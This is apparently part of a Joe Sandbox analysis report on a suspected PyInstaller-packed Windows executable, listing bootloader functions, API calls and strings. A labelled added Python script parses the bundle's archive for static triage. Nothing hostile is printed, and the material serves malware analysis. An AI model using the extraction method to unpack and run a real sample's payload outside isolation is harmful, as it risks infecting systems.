                                                                                                                        • Instruction Fuzzy Hash: 70F068717292558BDB98DF69AC1262A77D0F70C7C0F809039D58D83B54D63C90618F14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                        • Instruction ID: 75b64ebb6fef2a509c8515815dd3082429aec207c685c795734e709ddfd06af8
                                                                                                                        • Opcode Fuzzy Hash: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                        • Instruction Fuzzy Hash: 01A0016192E806D0EA89AB10AC60072A670EB68B00B820071D40D820B49E2CA4409260
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                         • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                        • API String ID: 190572456-3109299426
                                                                                                                        • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction ID: 77535d7d8ab5dd0a0d08a7e4fe6ee07d86921f00ba6d953b9259fc05048862b6
                                                                                                                        • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction Fuzzy Hash: 9A429BA4E7FB4791E959FB04AC70176A361AF0CF90BD661B6C40D06278FF7CA9588321
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                        • String ID: P%
                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                        • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction ID: 1636f47dbf3c1c5f2d8388925eaf6a8df6364e8d7bd8d1c95ff75bba22e16fcd
                                                                                                                        • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction Fuzzy Hash: 3B510626625BA186D628AF36E4281BBF7A1F798B65F004131EBDE43694DF3CD045DB20
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                        • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction ID: ff9f96565f9b3546b4d0f8c58f67b51de5f7abbdee0d93dab3afb5f225968293
                                                                                                                        • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction Fuzzy Hash: E3129761E2E14386FB207B14E96C67BF295FB84B50FC64035D6AA465E4DB3CE480CB61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                        • Opcode ID: 5b3bfaf0e584e3743198573b378c70cc12b99bd6b2472864a1b1c3417ea56a7d
                                                                                                                        • Instruction ID: 95ccff422aa373bc9a6efebe031e0977909bc32b6b807d5d6fd22fbebca9119c
                                                                                                                        • Opcode Fuzzy Hash: 5b3bfaf0e584e3743198573b378c70cc12b99bd6b2472864a1b1c3417ea56a7d
                                                                                                                        • Instruction Fuzzy Hash: 71413361A2A64281EA18FB15AC606BBF3A0EF48F94FD64431DE4D47A65EE3CE5428710
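The "Failed to get address for Py*" strings and the "Failed to extract %s: ..." strings above are the PyInstaller bootloader at work: it finds the CArchive appended to the executable, seeks to each entry's data, reads it (inflating it when flagged), then loads the bundled Python DLL and resolves the Python C API through GetProcAddress. The script below is an added example, not code from this report, from the analysed sample or from PyInstaller: a stand-alone parser for that archive layout, which is the static triage step to run before the bundle ever executes. It assumes the PyInstaller 2.1 and later trailer format (an 88-byte cookie packed as "!8sIIii64s", TOC records packed as "!iIIIBc" and padded to 16 bytes, data offsets relative to the package start, zlib when the flag is 1). The archive it parses is constructed in memory; its entry names, contents and Python version are made up and are not taken from the sample.

```python
"""Parse a PyInstaller CArchive (one-file bundle trailer + table of contents).

Added example; not the report's, the sample's or PyInstaller's own code.
Assumed layout (PyInstaller >= 2.1): an 88-byte cookie at the end of the
package, a TOC of 16-byte-padded records just before it, and data blobs whose
offsets are relative to the package start, zlib-compressed when flag == 1.
"""
import struct
import zlib

MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"        # magic, package len, TOC offset, TOC len, pyvers, python lib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)      # 88
ENTRY_FMT = "!iIIIBc"            # record len, data offset, compressed len, uncompressed len, flag, type
ENTRY_HDR_SIZE = struct.calcsize(ENTRY_FMT)    # 18


def build_archive(entries, pyvers=311, pylib=b"python311.dll"):
    """Write [data blobs][TOC][cookie] for (name, type_code, payload, compress) tuples.

    Only used to construct an offline test input; a real sample has the PE in front.
    """
    blobs, toc = bytearray(), bytearray()
    for name, typ, payload, compress in entries:
        data = zlib.compress(payload, 9) if compress else payload
        nm = name.encode("utf-8") + b"\0"
        rec_len = ENTRY_HDR_SIZE + len(nm)
        pad = (-rec_len) % 16                  # records are padded to a 16-byte boundary
        toc += struct.pack(ENTRY_FMT, rec_len + pad, len(blobs), len(data), len(payload),
                           1 if compress else 0, typ.encode("ascii")) + nm + b"\0" * pad
        blobs += data
    tocpos = len(blobs)
    pkglen = tocpos + len(toc) + COOKIE_SIZE   # package length covers data, TOC and cookie
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkglen, tocpos, len(toc), pyvers, pylib)
    return bytes(blobs + toc + cookie)


def parse_carchive(blob):
    """Return (info, entries) for a buffer ending in a CArchive; ValueError on a bad one."""
    cookie_pos = blob.rfind(MAGIC)             # from the end: the bootloader code carries the magic too
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    if len(blob) < cookie_pos + COOKIE_SIZE:
        raise ValueError("truncated cookie")
    _, pkglen, tocpos, toclen, pyvers, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_pos:cookie_pos + COOKIE_SIZE])
    pkg_start = cookie_pos + COOKIE_SIZE - pkglen  # package start is measured back from cookie end
    if pkg_start < 0 or tocpos + toclen + COOKIE_SIZE > pkglen:
        raise ValueError("cookie describes a package larger than the file")
    info = {"pyvers": pyvers, "pkg_start": pkg_start,
            "pylib": pylib.rstrip(b"\0").decode("ascii", "replace")}
    entries = []
    pos, end = pkg_start + tocpos, pkg_start + tocpos + toclen
    while pos < end:
        if pos + ENTRY_HDR_SIZE > end:
            raise ValueError("truncated TOC record at offset %d" % pos)
        rec_len, dpos, clen, ulen, flag, typ = struct.unpack(
            ENTRY_FMT, blob[pos:pos + ENTRY_HDR_SIZE])
        if rec_len <= ENTRY_HDR_SIZE or pos + rec_len > end:
            raise ValueError("corrupt TOC record at offset %d" % pos)
        name = blob[pos + ENTRY_HDR_SIZE:pos + rec_len].split(b"\0", 1)[0].decode("utf-8", "replace")
        if dpos + clen > tocpos:               # data must lie before the TOC: the bootloader's seek/read failure case
            raise ValueError("entry %r points outside the package" % name)
        data = blob[pkg_start + dpos:pkg_start + dpos + clen]
        if flag == 1:
            try:
                data = zlib.decompress(data)
            except zlib.error as exc:
                raise ValueError("entry %r: bad zlib stream (%s)" % (name, exc))
        if len(data) != ulen:
            raise ValueError("entry %r: uncompressed length mismatch" % name)
        entries.append({"name": name, "type": typ.decode("ascii"), "compressed": flag == 1, "data": data})
        pos += rec_len
    return info, entries


def triage(blob):
    """One line per entry, the view an analyst wants of a one-file bundle before running it."""
    info, entries = parse_carchive(blob)
    lines = ["Python %d.%d, runtime %s, package at file offset %d"
             % (info["pyvers"] // 100, info["pyvers"] % 100, info["pylib"], info["pkg_start"])]
    for e in entries:
        lines.append("%s %-24s %7d bytes%s" % (e["type"], e["name"], len(e["data"]),
                                               " (zlib)" if e["compressed"] else ""))
    return lines


# Constructed test input (names, contents and version are made up, not from the analysed sample).
SAMPLE_ENTRIES = [
    ("pyi_rth_inspect", "s", b"import sys\n", True),        # 's': script the bootloader runs
    ("python311.dll", "b", b"MZ" + b"\0" * 62, True),       # 'b': bundled binary
    ("PYZ-00.pyz", "z", b"PYZ\0" + b"\0" * 16, False),      # 'z': module collection
    ("main", "s", b"print('hello')\n", True),
]
SAMPLE_BLOB = b"MZ" + b"\x90" * 100 + build_archive(SAMPLE_ENTRIES)   # fake PE prefix + archive

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_BLOB)))
```

To use it on a real one-file sample, read the executable into `blob` and call `triage` or `parse_carchive`; `s` entries are the packed entry scripts, `z` the PYZ module collection, `b` the bundled DLLs. The bounds check on `dpos + clen` is the parser-side counterpart of the bootloader's "failed to seek" and "failed to read data chunk" errors, and is what stops a crafted TOC from reading outside the package. The `data` fields of a malicious bundle are the payload itself, so extract only in an isolated analysis environment.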
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                        • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction ID: f4a996eb0d89d37e1a2fbfe26e1c8a56fa9758cf967bf85b2c08dd60d1eac86f
                                                                                                                        • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction Fuzzy Hash: 16E1B872A2974586EB24EF65D8503AEB7A0FB48F88F910136EE4D57B65CF38E490C710
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A673769F
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A67376EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 626452242-27947307
                                                                                                                        • Opcode ID: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                        • Instruction ID: c597434b1ee8b956e0f29e1b9fed7723dcc682038d6a2e2622a4dbf1fe6a9732
                                                                                                                        • Opcode Fuzzy Hash: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                        • Instruction Fuzzy Hash: 02419232A2AB8281E625EF11BC5016BE7A5FB48B90F954135DA8D47BB8DF3CD051C710
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6737B81
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6737BF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 3723044601-27947307
                                                                                                                        • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction ID: 674c22706ca1dce763fe5f08bc495403be674943fa01283c7ea6178d188522d9
                                                                                                                        • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction Fuzzy Hash: 78219E21A2AB8285EA15AF11AC6117AF761EB88F80F894135CA4D437A8EF7CE451C310
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$p$p
                                                                                                                        • API String ID: 3215553584-1995029353
                                                                                                                        • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction ID: 676d0d0e284ef535519467082b1eae824432383dba27a2ea66bd151e1c4d1048
                                                                                                                        • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction Fuzzy Hash: 8B12C561E2E14386FB24BB14D86C6BBF795EB88F50FC6C035D699066E4DB3CE4408B61
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 626452242-876015163
                                                                                                                        • Opcode ID: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                        • Instruction ID: fb5f7c4ba782a0e678da344aefe0b9742fad4e6c9e8f92383e494be50e4c23ef
                                                                                                                        • Opcode Fuzzy Hash: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                        • Instruction Fuzzy Hash: D241C632A2AB4281E615EF15AC5017BA7A5FB48F90FA54135DA4D47BB8DF3CD011C714
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CF6D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CF7B
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFA5
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFEB
                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                        • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction ID: f262562618a1399e67060d60d5b07a0dd42001fe04e9522ff77f23afc289a166
                                                                                                                        • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction Fuzzy Hash: 1431A422B3B64291EE59FB12AC20576A394FF4CFA0F9A4535DD1D063A4EF3CE4459B20
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7A6737A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7A67367CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7A67364DF
                                                                                                                          • Part of subcall function 00007FF7A6732770: MessageBoxW.USER32 ref: 00007FF7A6732841
                                                                                                                        Strings
                                                                                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7A67364B6
